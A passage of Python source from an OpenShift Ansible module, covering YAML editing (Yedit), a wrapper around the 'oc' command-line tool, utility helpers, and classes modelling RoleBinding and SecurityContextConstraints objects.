entry = None
if entry is None:
return (False, self.yaml_dict)
if isinstance(entry, dict):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if key_or_item in entry:
entry.pop(key_or_item)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
try:
ind = entry.index(key_or_item)
except ValueError:
return (False, self.yaml_dict)
entry.pop(ind)
return (True, self.yaml_dict)
return (False, self.yaml_dict)
def delete(self, path):
''' remove path from a dict'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
return (False, self.yaml_dict)
result = Yedit.remove_entry(self.yaml_dict, path, self.separator)
if not result:
return (False, self.yaml_dict)
return (True, self.yaml_dict)
def exists(self, path, value):
''' check if value exists at path'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if isinstance(entry, list):
if value in entry:
return True
return False
elif isinstance(entry, dict):
if isinstance(value, dict):
rval = False
for key, val in value.items():
if entry[key] != val:
rval = False
break
else:
rval = True
return rval
return value in entry
return entry == value
def append(self, path, value):
'''append value to a list'''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry is None:
self.put(path, [])
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
if not isinstance(entry, list):
return (False, self.yaml_dict)
# AUDIT:maybe-no-member makes sense due to loading data from
# a serialized format.
# pylint: disable=maybe-no-member
entry.append(value)
return (True, self.yaml_dict)
# pylint: disable=too-many-arguments
def update(self, path, value, index=None, curr_value=None):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if isinstance(entry, dict):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
if not isinstance(value, dict):
raise YeditException('Cannot replace key, value entry in ' +
'dict with non-dict type. value=[%s] [%s]' % (value, type(value))) # noqa: E501
entry.update(value)
return (True, self.yaml_dict)
elif isinstance(entry, list):
# AUDIT:maybe-no-member makes sense due to fuzzy types
# pylint: disable=maybe-no-member
ind = None
if curr_value:
try:
ind = entry.index(curr_value)
except ValueError:
return (False, self.yaml_dict)
elif index is not None:
ind = index
if ind is not None and entry[ind] != value:
entry[ind] = value
return (True, self.yaml_dict)
# see if it exists in the list
try:
ind = entry.index(value)
except ValueError:
# doesn't exist, append it
entry.append(value)
return (True, self.yaml_dict)
# already exists, return
if ind is not None:
return (False, self.yaml_dict)
return (False, self.yaml_dict)
def put(self, path, value):
''' put path, value into a dict '''
try:
entry = Yedit.get_entry(self.yaml_dict, path, self.separator)
except KeyError:
entry = None
if entry == value:
return (False, self.yaml_dict)
# deepcopy didn't work
# Try to use ruamel.yaml and fallback to pyyaml
try:
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
default_flow_style=False),
yaml.RoundTripLoader)
except AttributeError:
tmp_copy = copy.deepcopy(self.yaml_dict)
# set the format attributes if available
try:
tmp_copy.fa.set_block_style()
except AttributeError:
pass
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if not result:
return (False, self.yaml_dict)
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
def create(self, path, value):
''' create a yaml file '''
if not self.file_exists():
# deepcopy didn't work
# Try to use ruamel.yaml and fallback to pyyaml
try:
tmp_copy = yaml.load(yaml.round_trip_dump(self.yaml_dict,
default_flow_style=False),
yaml.RoundTripLoader)
except AttributeError:
tmp_copy = copy.deepcopy(self.yaml_dict)
# set the format attributes if available
try:
tmp_copy.fa.set_block_style()
except AttributeError:
pass
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result:
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
return (False, self.yaml_dict)
@staticmethod
def get_curr_value(invalue, val_type):
'''return the current value'''
if invalue is None:
return None
curr_value = invalue
if val_type == 'yaml':
curr_value = yaml.load(invalue)
elif val_type == 'json':
curr_value = json.loads(invalue)
return curr_value
@staticmethod
def parse_value(inc_value, vtype=''):
'''determine value type passed'''
true_bools = ['y', 'Y', 'yes', 'Yes', 'YES', 'true', 'True', 'TRUE',
'on', 'On', 'ON', ]
false_bools = ['n', 'N', 'no', 'No', 'NO', 'false', 'False', 'FALSE',
'off', 'Off', 'OFF']
# It came in as a string but you didn't specify value_type as string
# we will convert to bool if it matches any of the above cases
if isinstance(inc_value, str) and 'bool' in vtype:
if inc_value not in true_bools and inc_value not in false_bools:
raise YeditException('Not a boolean type. str=[%s] vtype=[%s]'
% (inc_value, vtype))
elif isinstance(inc_value, bool) and 'str' in vtype:
inc_value = str(inc_value)
# If vtype is not str then go ahead and attempt to yaml load it.
if isinstance(inc_value, str) and 'str' not in vtype:
try:
inc_value = yaml.load(inc_value)
except Exception:
raise YeditException('Could not determine type of incoming ' +
'value. value=[%s] vtype=[%s]'
% (type(inc_value), vtype))
return inc_value
# pylint: disable=too-many-return-statements,too-many-branches
@staticmethod
def run_ansible(module):
'''perform the idempotent crud operations'''
yamlfile = Yedit(filename=module.params['src'],
backup=module.params['backup'],
separator=module.params['separator'])
if module.params['src']:
rval = yamlfile.load()
if yamlfile.yaml_dict is None and \
module.params['state'] != 'present':
return {'failed': True,
                        'msg': 'Error opening file [%s]. Verify that the '
                               'file exists, that it has correct '
                               'permissions, and is valid yaml.'
                               % module.params['src']}
if module.params['state'] == 'list':
if module.params['content']:
content = Yedit.parse_value(module.params['content'],
module.params['content_type'])
yamlfile.yaml_dict = content
if module.params['key']:
rval = yamlfile.get(module.params['key']) or {}
return {'changed': False, 'result': rval, 'state': "list"}
elif module.params['state'] == 'absent':
if module.params['content']:
content = Yedit.parse_value(module.params['content'],
module.params['content_type'])
yamlfile.yaml_dict = content
if module.params['update']:
rval = yamlfile.pop(module.params['key'],
module.params['value'])
else:
rval = yamlfile.delete(module.params['key'])
if rval[0] and module.params['src']:
yamlfile.write()
return {'changed': rval[0], 'result': rval[1], 'state': "absent"}
elif module.params['state'] == 'present':
# check if content is different than what is in the file
if module.params['content']:
content = Yedit.parse_value(module.params['content'],
module.params['content_type'])
# We had no edits to make and the contents are the same
if yamlfile.yaml_dict == content and \
module.params['value'] is None:
return {'changed': False,
'result': yamlfile.yaml_dict,
'state': "present"}
yamlfile.yaml_dict = content
# we were passed a value; parse it
if module.params['value']:
value = Yedit.parse_value(module.params['value'],
module.params['value_type'])
key = module.params['key']
if module.params['update']:
# pylint: disable=line-too-long
curr_value = Yedit.get_curr_value(Yedit.parse_value(module.params['curr_value']), # noqa: E501
module.params['curr_value_format']) # noqa: E501
rval = yamlfile.update(key, value, module.params['index'], curr_value) # noqa: E501
elif module.params['append']:
rval = yamlfile.append(key, value)
else:
rval = yamlfile.put(key, value)
if rval[0] and module.params['src']:
yamlfile.write()
return {'changed': rval[0],
'result': rval[1], 'state': "present"}
# no edits to make
if module.params['src']:
# pylint: disable=redefined-variable-type
rval = yamlfile.write()
return {'changed': rval[0],
'result': rval[1],
'state': "present"}
        return {'failed': True, 'msg': 'Unknown state passed'}
# -*- -*- -*- End included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/base.py -*- -*- -*-
# pylint: disable=too-many-lines
# noqa: E301,E302,E303,T001
class OpenShiftCLIError(Exception):
'''Exception class for openshiftcli'''
pass
ADDITIONAL_PATH_LOOKUPS = ['/usr/local/bin', os.path.expanduser('~/bin')]
def locate_oc_binary():
''' Find and return oc binary file '''
# https://github.com/openshift/openshift-ansible/issues/3410
# oc can be in /usr/local/bin in some cases, but that may not
# be in $PATH due to ansible/sudo
paths = os.environ.get("PATH", os.defpath).split(os.pathsep) + ADDITIONAL_PATH_LOOKUPS
oc_binary = 'oc'
# Use shutil.which if it is available, otherwise fallback to a naive path search
try:
which_result = shutil.which(oc_binary, path=os.pathsep.join(paths))
if which_result is not None:
oc_binary = which_result
except AttributeError:
for path in paths:
if os.path.exists(os.path.join(path, oc_binary)):
oc_binary = os.path.join(path, oc_binary)
break
return oc_binary
# pylint: disable=too-few-public-methods
class OpenShiftCLI(object):
''' Class to wrap the command line tools '''
def __init__(self,
namespace,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False,
all_namespaces=False):
''' Constructor for OpenshiftCLI '''
self.namespace = namespace
self.verbose = verbose
self.kubeconfig = Utils.create_tmpfile_copy(kubeconfig)
self.all_namespaces = all_namespaces
self.oc_binary = locate_oc_binary()
# Pylint allows only 5 arguments to be passed.
# pylint: disable=too-many-arguments
def _replace_content(self, resource, rname, content, force=False, sep='.'):
''' replace the current object with the content '''
res = self._get(resource, rname)
if not res['results']:
return res
fname = Utils.create_tmpfile(rname + '-')
yed = Yedit(fname, res['results'][0], separator=sep)
changes = []
for key, value in content.items():
changes.append(yed.put(key, value))
if any([change[0] for change in changes]):
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._replace(fname, force)
return {'returncode': 0, 'updated': False}
def _replace(self, fname, force=False):
'''replace the current object with oc replace'''
# We are removing the 'resourceVersion' to handle
# a race condition when modifying oc objects
yed = Yedit(fname)
results = yed.delete('metadata.resourceVersion')
if results[0]:
yed.write()
cmd = ['replace', '-f', fname]
if force:
cmd.append('--force')
return self.openshift_cmd(cmd)
def _create_from_content(self, rname, content):
'''create a temporary file and then call oc create on it'''
fname = Utils.create_tmpfile(rname + '-')
yed = Yedit(fname, content=content)
yed.write()
atexit.register(Utils.cleanup, [fname])
return self._create(fname)
def _create(self, fname):
'''call oc create on a filename'''
return self.openshift_cmd(['create', '-f', fname])
def _delete(self, resource, rname, selector=None):
'''call oc delete on a resource'''
cmd = ['delete', resource, rname]
if selector:
cmd.append('--selector=%s' % selector)
return self.openshift_cmd(cmd)
def _process(self, template_name, create=False, params=None, template_data=None): # noqa: E501
'''process a template
template_name: the name of the template to process
create: whether to send to oc create after processing
params: the parameters for the template
template_data: the incoming template's data; instead of a file
'''
cmd = ['process']
if template_data:
cmd.extend(['-f', '-'])
else:
cmd.append(template_name)
if params:
param_str = ["%s=%s" % (key, value) for key, value in params.items()]
cmd.append('-v')
cmd.extend(param_str)
results = self.openshift_cmd(cmd, output=True, input_data=template_data)
if results['returncode'] != 0 or not create:
return results
fname = Utils.create_tmpfile(template_name + '-')
yed = Yedit(fname, results['results'])
yed.write()
atexit.register(Utils.cleanup, [fname])
return self.openshift_cmd(['create', '-f', fname])
def _get(self, resource, rname=None, selector=None):
'''return a resource by name '''
cmd = ['get', resource]
if selector:
cmd.append('--selector=%s' % selector)
elif rname:
cmd.append(rname)
cmd.extend(['-o', 'json'])
rval = self.openshift_cmd(cmd, output=True)
        # Ensure results are returned in an array
if 'items' in rval:
rval['results'] = rval['items']
elif not isinstance(rval['results'], list):
rval['results'] = [rval['results']]
return rval
def _schedulable(self, node=None, selector=None, schedulable=True):
        ''' perform oadm manage-node schedulable '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
cmd.append('--schedulable=%s' % schedulable)
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw') # noqa: E501
def _list_pods(self, node=None, selector=None, pod_selector=None):
''' perform oadm list pods
node: the node in which to list pods
selector: the label selector filter if provided
pod_selector: the pod selector filter if provided
'''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
if pod_selector:
cmd.append('--pod-selector=%s' % pod_selector)
cmd.extend(['--list-pods', '-o', 'json'])
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
# pylint: disable=too-many-arguments
def _evacuate(self, node=None, selector=None, pod_selector=None, dry_run=False, grace_period=None, force=False):
''' perform oadm manage-node evacuate '''
cmd = ['manage-node']
if node:
cmd.extend(node)
else:
cmd.append('--selector=%s' % selector)
if dry_run:
cmd.append('--dry-run')
if pod_selector:
cmd.append('--pod-selector=%s' % pod_selector)
if grace_period:
cmd.append('--grace-period=%s' % int(grace_period))
if force:
cmd.append('--force')
cmd.append('--evacuate')
return self.openshift_cmd(cmd, oadm=True, output=True, output_type='raw')
def _version(self):
''' return the openshift version'''
return self.openshift_cmd(['version'], output=True, output_type='raw')
def _import_image(self, url=None, name=None, tag=None):
''' perform image import '''
cmd = ['import-image']
image = '{0}'.format(name)
if tag:
image += ':{0}'.format(tag)
cmd.append(image)
if url:
cmd.append('--from={0}/{1}'.format(url, image))
cmd.append('-n{0}'.format(self.namespace))
cmd.append('--confirm')
return self.openshift_cmd(cmd)
def _run(self, cmds, input_data):
''' Actually executes the command. This makes mocking easier. '''
curr_env = os.environ.copy()
curr_env.update({'KUBECONFIG': self.kubeconfig})
proc = subprocess.Popen(cmds,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=curr_env)
stdout, stderr = proc.communicate(input_data)
return proc.returncode, stdout.decode('utf-8'), stderr.decode('utf-8')
# pylint: disable=too-many-arguments,too-many-branches
def openshift_cmd(self, cmd, oadm=False, output=False, output_type='json', input_data=None):
'''Base command for oc '''
cmds = [self.oc_binary]
if oadm:
cmds.append('adm')
cmds.extend(cmd)
if self.all_namespaces:
cmds.extend(['--all-namespaces'])
        elif self.namespace is not None and self.namespace.lower() not in ['none', 'empty']:  # E501
cmds.extend(['-n', self.namespace])
rval = {}
results = ''
err = None
if self.verbose:
print(' '.join(cmds))
try:
returncode, stdout, stderr = self._run(cmds, input_data)
except OSError as ex:
returncode, stdout, stderr = 1, '', 'Failed to execute {}: {}'.format(subprocess.list2cmdline(cmds), ex)
rval = {"returncode": returncode,
"results": results,
"cmd": ' '.join(cmds)}
if returncode == 0:
if output:
if output_type == 'json':
try:
rval['results'] = json.loads(stdout)
except ValueError as err:
if "No JSON object could be decoded" in err.args:
err = err.args
elif output_type == 'raw':
rval['results'] = stdout
if self.verbose:
print("STDOUT: {0}".format(stdout))
print("STDERR: {0}".format(stderr))
if err:
rval.update({"err": err,
"stderr": stderr,
"stdout": stdout,
"cmd": cmds})
else:
rval.update({"stderr": stderr,
"stdout": stdout,
"results": {}})
return rval
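    # Illustration of the command assembly above (names are examples):
    # openshift_cmd(['get', 'pods']) in namespace 'default' runs roughly
    # ['oc', 'get', 'pods', '-n', 'default']; oadm=True inserts 'adm'
    # right after the oc binary, and all_namespaces=True appends
    # '--all-namespaces' in place of the '-n <namespace>' pair.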
class Utils(object):
''' utilities for openshiftcli modules '''
@staticmethod
def _write(filename, contents):
''' Actually write the file contents to disk. This helps with mocking. '''
with open(filename, 'w') as sfd:
sfd.write(contents)
@staticmethod
def create_tmp_file_from_contents(rname, data, ftype='yaml'):
''' create a file in tmp with name and contents'''
tmp = Utils.create_tmpfile(prefix=rname)
if ftype == 'yaml':
# AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
# pylint: disable=no-member
if hasattr(yaml, 'RoundTripDumper'):
Utils._write(tmp, yaml.dump(data, Dumper=yaml.RoundTripDumper))
else:
Utils._write(tmp, yaml.safe_dump(data, default_flow_style=False))
elif ftype == 'json':
Utils._write(tmp, json.dumps(data))
else:
Utils._write(tmp, data)
# Register cleanup when module is done
atexit.register(Utils.cleanup, [tmp])
return tmp
@staticmethod
def create_tmpfile_copy(inc_file):
'''create a temporary copy of a file'''
tmpfile = Utils.create_tmpfile('lib_openshift-')
Utils._write(tmpfile, open(inc_file).read())
# Cleanup the tmpfile
atexit.register(Utils.cleanup, [tmpfile])
return tmpfile
@staticmethod
def create_tmpfile(prefix='tmp'):
''' Generates and returns a temporary file name '''
with tempfile.NamedTemporaryFile(prefix=prefix, delete=False) as tmp:
return tmp.name
@staticmethod
def create_tmp_files_from_contents(content, content_type=None):
'''Turn an array of dict: filename, content into a files array'''
if not isinstance(content, list):
content = [content]
files = []
for item in content:
path = Utils.create_tmp_file_from_contents(item['path'] + '-',
item['data'],
ftype=content_type)
files.append({'name': os.path.basename(item['path']),
'path': path})
return files
@staticmethod
def cleanup(files):
'''Clean up on exit '''
for sfile in files:
if os.path.exists(sfile):
if os.path.isdir(sfile):
shutil.rmtree(sfile)
elif os.path.isfile(sfile):
os.remove(sfile)
@staticmethod
def exists(results, _name):
''' Check to see if the results include the name '''
if not results:
return False
if Utils.find_result(results, _name):
return True
return False
@staticmethod
def find_result(results, _name):
''' Find the specified result by name'''
rval = None
for result in results:
if 'metadata' in result and result['metadata']['name'] == _name:
rval = result
break
return rval
@staticmethod
def get_resource_file(sfile, sfile_type='yaml'):
''' return the service file '''
contents = None
with open(sfile) as sfd:
contents = sfd.read()
if sfile_type == 'yaml':
# AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
# pylint: disable=no-member
if hasattr(yaml, 'RoundTripLoader'):
contents = yaml.load(contents, yaml.RoundTripLoader)
else:
contents = yaml.safe_load(contents)
elif sfile_type == 'json':
contents = json.loads(contents)
return contents
@staticmethod
def filter_versions(stdout):
''' filter the oc version output '''
version_dict = {}
version_search = ['oc', 'openshift', 'kubernetes']
for line in stdout.strip().split('\n'):
for term in version_search:
if not line:
continue
if line.startswith(term):
version_dict[term] = line.split()[-1]
# horrible hack to get openshift version in Openshift 3.2
# By default "oc version in 3.2 does not return an "openshift" version
if "openshift" not in version_dict:
version_dict["openshift"] = version_dict["oc"]
return version_dict
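    # Example (version strings are made up): given the stdout lines
    #   oc v3.6.0
    #   openshift v3.6.0
    #   kubernetes v1.6.1+5115d708d7
    # filter_versions returns {'oc': 'v3.6.0', 'openshift': 'v3.6.0',
    # 'kubernetes': 'v1.6.1+5115d708d7'}.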
@staticmethod
def add_custom_versions(versions):
''' create custom versions strings '''
versions_dict = {}
for tech, version in versions.items():
# clean up "-" from version
if "-" in version:
version = version.split("-")[0]
if version.startswith('v'):
versions_dict[tech + '_numeric'] = version[1:].split('+')[0]
# "v3.3.0.33" is what we have, we want "3.3"
versions_dict[tech + '_short'] = version[1:4]
return versions_dict
@staticmethod
def openshift_installed():
''' check if openshift is installed '''
import yum
yum_base = yum.YumBase()
if yum_base.rpmdb.searchNevra(name='atomic-openshift'):
return True
return False
# Disabling too-many-branches. This is a yaml dictionary comparison function
# pylint: disable=too-many-branches,too-many-return-statements,too-many-statements
@staticmethod
def check_def_equal(user_def, result_def, skip_keys=None, debug=False):
''' Given a user defined definition, compare it with the results given back by our query. '''
# Currently these values are autogenerated and we do not need to check them
skip = ['metadata', 'status']
if skip_keys:
skip.extend(skip_keys)
for key, value in result_def.items():
if key in skip:
continue
# Both are lists
if isinstance(value, list):
if key not in user_def:
if debug:
print('User data does not have key [%s]' % key)
print('User data: %s' % user_def)
return False
if not isinstance(user_def[key], list):
if debug:
print('user_def[key] is not a list key=[%s] user_def[key]=%s' % (key, user_def[key]))
return False
if len(user_def[key]) != len(value):
if debug:
print("List lengths are not equal.")
print("key=[%s]: user_def[%s] != value[%s]" % (key, len(user_def[key]), len(value)))
print("user_def: %s" % user_def[key])
print("value: %s" % value)
return False
for values in zip(user_def[key], value):
if isinstance(values[0], dict) and isinstance(values[1], dict):
if debug:
print('sending list - list')
print(type(values[0]))
print(type(values[1]))
result = Utils.check_def_equal(values[0], values[1], skip_keys=skip_keys, debug=debug)
if not result:
print('list compare returned false')
return False
elif value != user_def[key]:
if debug:
print('value should be identical')
print(user_def[key])
print(value)
return False
# recurse on a dictionary
elif isinstance(value, dict):
if key not in user_def:
if debug:
print("user_def does not have key [%s]" % key)
return False
if not isinstance(user_def[key], dict):
if debug:
print("dict returned false: not instance of dict")
return False
# before passing ensure keys match
api_values = set(value.keys()) - set(skip)
user_values = set(user_def[key].keys()) - set(skip)
if api_values != user_values:
if debug:
print("keys are not equal in dict")
print(user_values)
print(api_values)
return False
result = Utils.check_def_equal(user_def[key], value, skip_keys=skip_keys, debug=debug)
if not result:
if debug:
print("dict returned false")
print(result)
return False
# Verify each key, value pair is the same
else:
if key not in user_def or value != user_def[key]:
if debug:
print("value not equal; user_def does not have key")
print(key)
print(value)
if key in user_def:
print(user_def[key])
return False
if debug:
print('returning true')
return True
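# Illustration of Utils.check_def_equal (the dicts are made up): the walk
# is driven by the result definition, 'metadata' and 'status' are skipped
# by default, and nested dicts must have matching key sets minus skips.
#   Utils.check_def_equal({'spec': {'replicas': 1}},
#                         {'spec': {'replicas': 1}, 'status': {'x': 1}})
# evaluates to True, while a differing 'spec' value would return False.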
class OpenShiftCLIConfig(object):
'''Generic Config'''
def __init__(self, rname, namespace, kubeconfig, options):
self.kubeconfig = kubeconfig
self.name = rname
self.namespace = namespace
self._options = options
@property
def config_options(self):
''' return config options '''
return self._options
def to_option_list(self):
        '''return all options as a list of cli params'''
return self.stringify()
def stringify(self):
        ''' return the options hash as a list of cli params '''
rval = []
for key, data in self.config_options.items():
if data['include'] \
and (data['value'] or isinstance(data['value'], int)):
rval.append('--%s=%s' % (key.replace('_', '-'), data['value']))
return rval
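    # Example of the serialization above (the option name is invented):
    #   {'node_selector': {'value': 'region=infra', 'include': True}}
    # stringifies to ['--node-selector=region=infra']; entries with
    # include=False, or an empty value that is not an int, are omitted.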
# -*- -*- -*- End included fragment: lib/base.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/rolebinding.py -*- -*- -*-
# pylint: disable=too-many-instance-attributes
class RoleBindingConfig(object):
''' Handle rolebinding config '''
# pylint: disable=too-many-arguments
def __init__(self,
name,
namespace,
kubeconfig,
group_names=None,
role_ref=None,
subjects=None,
usernames=None):
''' constructor for handling rolebinding options '''
self.kubeconfig = kubeconfig
self.name = name
self.namespace = namespace
self.group_names = group_names
self.role_ref = role_ref
self.subjects = subjects
self.usernames = usernames
self.data = {}
self.create_dict()
def create_dict(self):
''' create a default rolebinding as a dict '''
self.data['apiVersion'] = 'v1'
self.data['kind'] = 'RoleBinding'
self.data['groupNames'] = self.group_names
        # initialise the nested metadata dict before assigning into it;
        # without this the assignment raises a KeyError
        self.data['metadata'] = {}
        self.data['metadata']['name'] = self.name
self.data['metadata']['namespace'] = self.namespace
self.data['roleRef'] = self.role_ref
self.data['subjects'] = self.subjects
self.data['userNames'] = self.usernames
# pylint: disable=too-many-instance-attributes,too-many-public-methods
class RoleBinding(Yedit):
''' Class to model a rolebinding openshift object'''
group_names_path = "groupNames"
role_ref_path = "roleRef"
subjects_path = "subjects"
user_names_path = "userNames"
kind = 'RoleBinding'
def __init__(self, content):
'''RoleBinding constructor'''
super(RoleBinding, self).__init__(content=content)
self._subjects = None
self._role_ref = None
self._group_names = None
self._user_names = None
@property
def subjects(self):
''' subjects property '''
if self._subjects is None:
self._subjects = self.get_subjects()
return self._subjects
@subjects.setter
def subjects(self, data):
''' subjects property setter'''
self._subjects = data
@property
def role_ref(self):
''' role_ref property '''
if self._role_ref is None:
self._role_ref = self.get_role_ref()
return self._role_ref
@role_ref.setter
def role_ref(self, data):
''' role_ref property setter'''
self._role_ref = data
@property
def group_names(self):
''' group_names property '''
if self._group_names is None:
self._group_names = self.get_group_names()
return self._group_names
@group_names.setter
def group_names(self, data):
''' group_names property setter'''
self._group_names = data
@property
def user_names(self):
''' user_names property '''
if self._user_names is None:
self._user_names = self.get_user_names()
return self._user_names
@user_names.setter
def user_names(self, data):
''' user_names property setter'''
self._user_names = data
def get_group_names(self):
''' return groupNames '''
return self.get(RoleBinding.group_names_path) or []
def get_user_names(self):
''' return usernames '''
return self.get(RoleBinding.user_names_path) or []
def get_role_ref(self):
''' return role_ref '''
return self.get(RoleBinding.role_ref_path) or {}
def get_subjects(self):
''' return subjects '''
return self.get(RoleBinding.subjects_path) or []
#### ADD #####
def add_subject(self, inc_subject):
''' add a subject '''
if self.subjects:
# pylint: disable=no-member
self.subjects.append(inc_subject)
else:
self.put(RoleBinding.subjects_path, [inc_subject])
return True
def add_role_ref(self, inc_role_ref):
''' add a role_ref '''
if not self.role_ref:
self.put(RoleBinding.role_ref_path, {"name": inc_role_ref})
return True
return False
def add_group_names(self, inc_group_names):
''' add a group_names '''
if self.group_names:
# pylint: disable=no-member
self.group_names.append(inc_group_names)
else:
self.put(RoleBinding.group_names_path, [inc_group_names])
return True
def add_user_name(self, inc_user_name):
''' add a username '''
if self.user_names:
# pylint: disable=no-member
self.user_names.append(inc_user_name)
else:
self.put(RoleBinding.user_names_path, [inc_user_name])
return True
#### /ADD #####
#### Remove #####
def remove_subject(self, inc_subject):
''' remove a subject '''
try:
# pylint: disable=no-member
self.subjects.remove(inc_subject)
except ValueError as _:
return False
return True
def remove_role_ref(self, inc_role_ref):
''' remove a role_ref '''
if self.role_ref and self.role_ref['name'] == inc_role_ref:
del self.role_ref['name']
return True
return False
def remove_group_name(self, inc_group_name):
''' remove a groupname '''
try:
# pylint: disable=no-member
self.group_names.remove(inc_group_name)
except ValueError as _:
return False
return True
def remove_user_name(self, inc_user_name):
''' remove a username '''
try:
# pylint: disable=no-member
self.user_names.remove(inc_user_name)
except ValueError as _:
return False
return True
#### /REMOVE #####
#### UPDATE #####
def update_subject(self, inc_subject):
''' update a subject '''
try:
# pylint: disable=no-member
index = self.subjects.index(inc_subject)
except ValueError as _:
return self.add_subject(inc_subject)
self.subjects[index] = inc_subject
return True
def update_group_name(self, inc_group_name):
''' update a groupname '''
try:
# pylint: disable=no-member
index = self.group_names.index(inc_group_name)
except ValueError as _:
return self.add_group_names(inc_group_name)
self.group_names[index] = inc_group_name
return True
def update_user_name(self, inc_user_name):
''' update a username '''
try:
# pylint: disable=no-member
index = self.user_names.index(inc_user_name)
except ValueError as _:
return self.add_user_name(inc_user_name)
self.user_names[index] = inc_user_name
return True
def update_role_ref(self, inc_role_ref):
''' update a role_ref '''
self.role_ref['name'] = inc_role_ref
return True
#### /UPDATE #####
#### FIND ####
def find_subject(self, inc_subject):
''' find a subject '''
index = None
try:
# pylint: disable=no-member
index = self.subjects.index(inc_subject)
except ValueError as _:
return index
return index
def find_group_name(self, inc_group_name):
''' find a group_name '''
index = None
try:
# pylint: disable=no-member
index = self.group_names.index(inc_group_name)
except ValueError as _:
return index
return index
def find_user_name(self, inc_user_name):
''' find a user_name '''
index = None
try:
# pylint: disable=no-member
index = self.user_names.index(inc_user_name)
except ValueError as _:
return index
return index
def find_role_ref(self, inc_role_ref):
        ''' find a role_ref '''
if self.role_ref and self.role_ref['name'] == inc_role_ref['name']:
return self.role_ref
return None
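# Usage sketch for RoleBinding (the content below is minimal and made up):
#   rb = RoleBinding({'kind': 'RoleBinding', 'groupNames': ['devs'],
#                     'roleRef': {'name': 'edit'}, 'subjects': [],
#                     'userNames': []})
#   rb.add_group_names('qa')    # appends, since groupNames already exists
#   rb.find_group_name('qa')    # -> 1, its index within groupNames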
# -*- -*- -*- End included fragment: lib/rolebinding.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/scc.py -*- -*- -*-
# pylint: disable=too-many-instance-attributes
class SecurityContextConstraintsConfig(object):
''' Handle scc options '''
# pylint: disable=too-many-arguments
def __init__(self,
sname,
kubeconfig,
options=None,
fs_group='MustRunAs',
default_add_capabilities=None,
groups=None,
priority=None,
required_drop_capabilities=None,
run_as_user='MustRunAsRange',
se_linux_context='MustRunAs',
supplemental_groups='RunAsAny',
users=None,
annotations=None):
''' constructor for handling scc options '''
self.kubeconfig = kubeconfig
self.name = sname
self.options = options
self.fs_group = fs_group
self.default_add_capabilities = default_add_capabilities
self.groups = groups
self.priority = priority
self.required_drop_capabilities = required_drop_capabilities
self.run_as_user = run_as_user
self.se_linux_context = se_linux_context
self.supplemental_groups = supplemental_groups
self.users = users
self.annotations = annotations
self.data = {}
self.create_dict()
def create_dict(self):
''' assign the correct properties for a scc dict '''
# allow options
if self.options:
for key, value in self.options.items():
self.data[key] = value
else:
self.data['allowHostDirVolumePlugin'] = False
self.data['allowHostIPC'] = False
self.data['allowHostNetwork'] = False
self.data['allowHostPID'] = False
self.data['allowHostPorts'] = False
self.data['allowPrivilegedContainer'] = False
self.data['allowedCapabilities'] = None
# version
self.data['apiVersion'] = 'v1'
# kind
self.data['kind'] = 'SecurityContextConstraints'
# defaultAddCapabilities
self.data['defaultAddCapabilities'] = self.default_add_capabilities
# fsGroup
        self.data['fsGroup'] = {'type': self.fs_group}
# groups
self.data['groups'] = []
if self.groups:
self.data['groups'] = self.groups
# metadata
self.data['metadata'] = {}
self.data['metadata']['name'] = self.name
if self.annotations:
for key, value in self.annotations.items():
self.data['metadata'][key] = value
# priority
self.data['priority'] = self.priority
# requiredDropCapabilities
self.data['requiredDropCapabilities'] = self.required_drop_capabilities
# runAsUser
self.data['runAsUser'] = {'type': self.run_as_user}
# seLinuxContext
self.data['seLinuxContext'] = {'type': self.se_linux_context}
# supplementalGroups
self.data['supplementalGroups'] = {'type': self.supplemental_groups}
# users
self.data['users'] = []
if self.users:
self.data['users'] = self.users
# pylint: disable=too-many-instance-attributes,too-many-public-methods,no-member
class SecurityContextConstraints(Yedit):
    ''' Class to model a SecurityContextConstraints openshift object '''
default_add_capabilities_path = "defaultAddCapabilities"
fs_group_path = "fsGroup"
groups_path = "groups"
priority_path = "priority"
required_drop_capabilities_path = "requiredDropCapabilities"
run_as_user_path = "runAsUser"
se_linux_context_path = "seLinuxContext"
supplemental_groups_path = "supplementalGroups"
users_path = "users"
kind = 'SecurityContextConstraints'
def __init__(self, content):
'''SecurityContextConstraints constructor'''
super(SecurityContextConstraints, self).__init__(content=content)
self._users = None
self._groups = None
@property
def users(self):
''' users property getter '''
if self._users is None:
self._users = self.get_users()
return self._users
@property
def groups(self):
''' groups property getter '''
if self._groups is None:
self._groups = self.get_groups()
return self._groups
@users.setter
def users(self, data):
''' users property setter'''
self._users = data
@groups.setter
def groups(self, data):
''' groups property setter'''
self._groups = data
def get_users(self):
'''get scc users'''
return self.get(SecurityContextConstraints.users_path) or []
def get_groups(self):
'''get scc groups'''
return self.get(SecurityContextConstraints.groups_path) or []
